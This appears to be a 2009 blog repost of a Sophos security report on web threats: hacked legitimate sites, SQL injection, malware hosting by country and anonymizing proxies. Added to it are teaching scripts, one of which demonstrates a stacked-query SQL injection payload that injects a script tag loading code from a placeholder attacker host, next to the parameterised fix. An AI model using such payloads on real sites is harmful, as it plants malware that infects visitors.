Wednesday, February 25, 2009

2009 Security threat report: Web threats

Exploiting legitimate websites

In the last couple of years the web has become a major vector of attack for cybercriminals, replacing their previous reliance on email. By exploiting poorly secured legitimate websites, hackers have been able to implant malicious code on them which then attempts to infect every visitor. One reason the web is so attractive to attackers is that legitimate websites draw large numbers of visitors, each of whom is a potential victim.

Many well known organizations and brands have fallen victim to this kind of attack during 2008. Both large and small organizations have been targeted, emphasizing the importance of proper web security across the board.

January 2008: Thousands of websites belonging to Fortune 500 companies, government agencies and schools were infected with malicious code.

February 2008: UK broadcaster ITV was the victim of a poisoned web advert campaign, designed to deliver scareware to Windows and Mac users.

March 2008: A site selling tickets for the Euro 2008 football championship was hacked, while anti-virus firm Trend Micro found that some of its own webpages had been compromised.

April 2008: Cambridge University Press’s website was compromised so that visitors to its online dictionary were served unauthorized hacker scripts.

June 2008: As the Wimbledon tennis tournament opened in the UK, the Association of Tennis Professionals site was infected.

July 2008: Sony’s US PlayStation website suffered an SQL injection attack which put visiting consumers at risk from scareware.

September 2008: BusinessWeek magazine’s website was hit by an SQL injection attack that attempted to download malware from a Russian-based server.

October 2008: An area of the Adobe website designed to offer support to video bloggers was compromised by an SQL injection attack.

SQL injection attacks

One of the major headline grabbers of 2008 was the SQL injection attack. Such attacks exploit security vulnerabilities in a site’s code to insert malicious content (in this case script tags) into the database behind the site. When user input, for instance from a web form or a URL parameter, is not correctly filtered or checked, an attacker can append SQL instructions of their own to the query the site was going to run, and those injected statements pepper the database with script tags that are then served to every visitor. Recovery can be difficult, and there are numerous cases of website owners cleaning up their database only to be hit again a few hours later, because cleaning the data does nothing to close the hole the automated tools came in through.
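As an added illustration (not code from the report or from Sophos), the following Python script, using the standard sqlite3 module, shows the mechanism described above on a constructed two-row news table: a lookup that pastes the request parameter into the SQL text, a constructed payload in the style of the 2008 mass-injection attacks that appends a script tag to every row, the parameterised query that stores the same input harmlessly as data, and a clean-up sweep that finds and strips the injected tags. The table, rows, payload and attacker hostname are all made up for the example.

```python
import re
import sqlite3

# Constructed sample schema (not from the original page): a small news table
# of the kind the 2008 mass-injection attacks rewrote.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
INSERT INTO news (title, body) VALUES
  ('Euro 2008 tickets', 'Tickets on sale now.'),
  ('Wimbledon opens', 'Play starts Monday.');
"""

# Constructed payload modelled on the 2008 attacks: finish the intended
# statement, then append an UPDATE that tacks a script tag onto every row.
# The hostname is a placeholder.
PAYLOAD = (
    "1; UPDATE news SET body = body || "
    "'<script src=\"http://attacker.example/m.js\"></script>'"
)

SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def fresh_db():
    """In-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, news_id):
    """The flaw: the request parameter is pasted into the SQL text unchecked.

    executescript() is used so that stacked statements run, mirroring the
    database configurations the 2008 attacks relied on; sqlite3's execute()
    by itself refuses more than one statement.
    """
    sql = f"SELECT title, body FROM news WHERE id = {news_id}"
    conn.executescript(sql)


def lookup_safe(conn, news_id):
    """The fix: bind the parameter, so it can only ever be compared as data."""
    return conn.execute(
        "SELECT title, body FROM news WHERE id = ?", (news_id,)
    ).fetchall()


def bodies(conn):
    """Current body text of every row, in id order."""
    return [row[0] for row in conn.execute("SELECT body FROM news ORDER BY id")]


def find_injected_rows(conn):
    """Ids of rows whose body carries a script tag: what a clean-up sweep looks for."""
    return [
        row_id
        for row_id, body in conn.execute("SELECT id, body FROM news ORDER BY id")
        if SCRIPT_TAG.search(body)
    ]


def clean_injected_rows(conn):
    """Strip injected script tags; returns the number of rows changed.

    This removes the symptom only. Until the query in lookup_vulnerable()
    is replaced by the parameterised one, the next automated sweep
    reinjects the rows.
    """
    changed = 0
    for row_id, body in conn.execute("SELECT id, body FROM news").fetchall():
        stripped = SCRIPT_TAG.sub("", body)
        if stripped != body:
            conn.execute("UPDATE news SET body = ? WHERE id = ?", (stripped, row_id))
            changed += 1
    conn.commit()
    return changed


if __name__ == "__main__":
    db = fresh_db()
    lookup_vulnerable(db, PAYLOAD)
    print("after vulnerable lookup:", bodies(db))
    print("rows carrying script tags:", find_injected_rows(db))
    print("rows cleaned:", clean_injected_rows(db))
    db = fresh_db()
    print("safe lookup with payload returns:", lookup_safe(db, PAYLOAD))
    print("rows carrying script tags:", find_injected_rows(db))
```

Run it and the first lookup rewrites both rows; the sweep then reports two rows cleaned. That is the recovery the text describes, and it is also why sites were hit again within hours: stripping tags from the data leaves lookup_vulnerable() in place, so the next automated pass repeats the injection. The durable fix is the bound parameter in lookup_safe(), which returns no rows for the payload and changes nothing.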

Automated systems

Hackers have developed automated tools that use search engines such as Google to identify potentially vulnerable websites, and then inject code into the servers. Websites are rarely specifically targeted, and are often just unfortunate enough to have been discovered by the cybercriminals’ malware distribution tool.

Cybercriminals are also building their own malware-infected websites, often using free web-hosting services which do not require users to go through a rigorous identification process. They then use automated systems to plant malicious links on legitimate blogs and web forums, pointing at these infected sites.

For instance, during 2008 Sophos encountered many examples of legitimate blogs and message boards carrying comments which linked to websites pretending to offer adult videos, but which actually demanded a browser plugin upgrade before anything could be seen. The fake codec or bogus Flash Player update that the user downloaded was in reality scareware, which attempts to frighten the user into purchasing fake security software.

Top 10 countries hosting malware on the web

In 2008 the US, China and Russia accounted for almost three quarters of all the world’s malware-hosting websites. However, it would be misleading to believe that other countries are not also contributing to the problem.

The top 10 malware hosting countries:
US 37.0%
China (inc HK) 27.7%
Russia 9.1%
Germany 2.3%
South Korea 2.1%
Ukraine 1.8%
UK 1.7%
Turkey 1.5%
Czech Republic 1.3%
Thailand 1.2%
Other 14.3%

Sophos research reveals that there is a “long tail” effect with more than 150 countries identified as hosting malware on webpages based within their borders. Of these affected webpages, 85 percent are on legitimate websites that have been hacked by criminals.

User resistance

Although web security is designed to protect against malware and other threats, some users have responded negatively and taken steps to subvert the protection. This is particularly true where companies and organizations filter URLs for policy reasons, such as blocking social networking or video websites.

Anonymizing proxies

Some users have responded to web filtering by using anonymizing proxies, which disguise the true destination of a request in order to trick an organization’s web filter into allowing access.

Information about public anonymizing proxies is shared freely on thousands of blogs, forums and websites, and there are an unknown number of private anonymizing proxies built for the use of individuals or small groups. This makes it extremely easy for users to find an anonymizing proxy, but difficult and time-consuming for administrators to track and block them. If users are browsing via anonymizing proxies then, in addition to bypassing URL filtering, they are also circumventing content scanning at the perimeter, which dramatically increases the chance of infection.

Sophos has even identified anonymizing proxies that are themselves infected with malware. It is not possible to tell whether these proxies are the innocent victims of infection, or were set up with malware embedded inside them. But regardless of whether the infection is deliberate or not, anyone using them runs a real risk of infecting their computer and the network it is connected to.

Anonymizing proxy use appears to be particularly prevalent among educational establishments, where technology-savvy students attempt to subvert acceptable use policies. Sophos actively tracks internet forums to discover new anonymizing proxy services, and incorporates real-time detection of private anonymizing proxies through traffic inspection in its web appliance.
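Added example, not Sophos code: a Python sketch of why a URL-based web filter on its own is beaten by an anonymizing proxy, and of the extra step that catches the common CGI-proxy pattern, where the real destination travels inside a query parameter of the proxy’s own URL, either percent-encoded or base64-encoded. The block list, the proxy parameter names (u, q, url), the proxy.example host and the sample requests are all constructed for the example and are not taken from any product or report.

```python
import base64
from urllib.parse import parse_qs, urlparse

# Constructed policy: categories this organisation blocks at the web filter.
BLOCKED_DOMAINS = {"video.example", "social.example"}

# Query parameters that web-based (CGI) proxies commonly use to carry the
# real destination. Assumed names for the example, not product documentation.
PROXY_PARAMS = ("u", "q", "url")


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def blocked_by_policy(host):
    """Plain URL filtering: the host, or a parent domain, is on the block list."""
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)


def unwrap_proxy(url):
    """Recover the destination hidden inside a CGI-proxy style URL, or None.

    Tries the two encodings such proxies usually apply to the target:
    percent-encoded plain text and base64.
    """
    params = parse_qs(urlparse(url).query)
    for key in PROXY_PARAMS:
        for value in params.get(key, []):
            # parse_qs has already percent-decoded the value and turned '+'
            # into spaces; the base64 attempt puts the '+' back first.
            candidates = [value]
            try:
                candidates.append(
                    base64.b64decode(value.replace(" ", "+"), validate=True).decode("utf-8")
                )
            except ValueError:  # not base64, bad padding, or non-UTF-8 bytes
                pass
            for candidate in candidates:
                if candidate.startswith(("http://", "https://")):
                    return candidate
    return None


def classify(url):
    """Return (verdict, reason) for one requested URL."""
    if blocked_by_policy(host_of(url)):
        return "block", "policy:" + host_of(url)
    inner = unwrap_proxy(url)
    if inner is not None:
        # A request that tunnels another site through a proxy page sidesteps
        # both the URL filter and content scanning at the perimeter, so the
        # proxy is blocked whatever the inner site is.
        return "block", "proxy:" + host_of(inner)
    return "allow", ""


def run_filter(urls):
    return [(url,) + classify(url) for url in urls]


# Constructed sample requests (not real traffic). The base64 values are
# built here so that the encoded strings are exact.
SAMPLE_REQUESTS = [
    "http://news.example/story/123",
    "http://video.example/watch?v=abc",
    "http://proxy.example/browse.php?u="
    + base64.b64encode(b"http://video.example/watch?v=abc").decode()
    + "&b=4",
    "http://proxy.example/index.php?q=http%3A%2F%2Fsocial.example%2Fhome",
    "http://proxy.example/browse.php?u="
    + base64.b64encode(b"http://news.example/story/123").decode(),
    "http://shop.example/search?q=tennis+racket",
]

if __name__ == "__main__":
    for url, verdict, reason in run_filter(SAMPLE_REQUESTS):
        print(f"{verdict:5} {reason:24} {url}")
```

The second request is stopped by the plain block list; the third reaches the same video site through proxy.example and would sail through a filter that only looks at the outer hostname. The sixth request shows the obvious weakness of parameter-name heuristics: an ordinary search query in a q parameter must not be flagged, which is why real products pair this sort of URL unwrapping with inspection of the traffic itself, as the text describes.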

Malware chart rundown

The US tops the chart with just under three in every eight infected webpages based there. This is an increase over 2007, when it accounted for less than one in four (23.4 percent).

China, which was responsible for hosting more than half (51.4 percent) of all the world’s web-hosted malware in 2007, has now almost halved its proportional contribution to the problem.

The Czech Republic is a new entrant on the list and hosts over one percent of all the world’s malware on the web.

Poland, France, Canada and the Netherlands occupied positions six, eight, nine and ten respectively in 2007, but now host too few malicious websites to appear on the chart.

Sophos.com
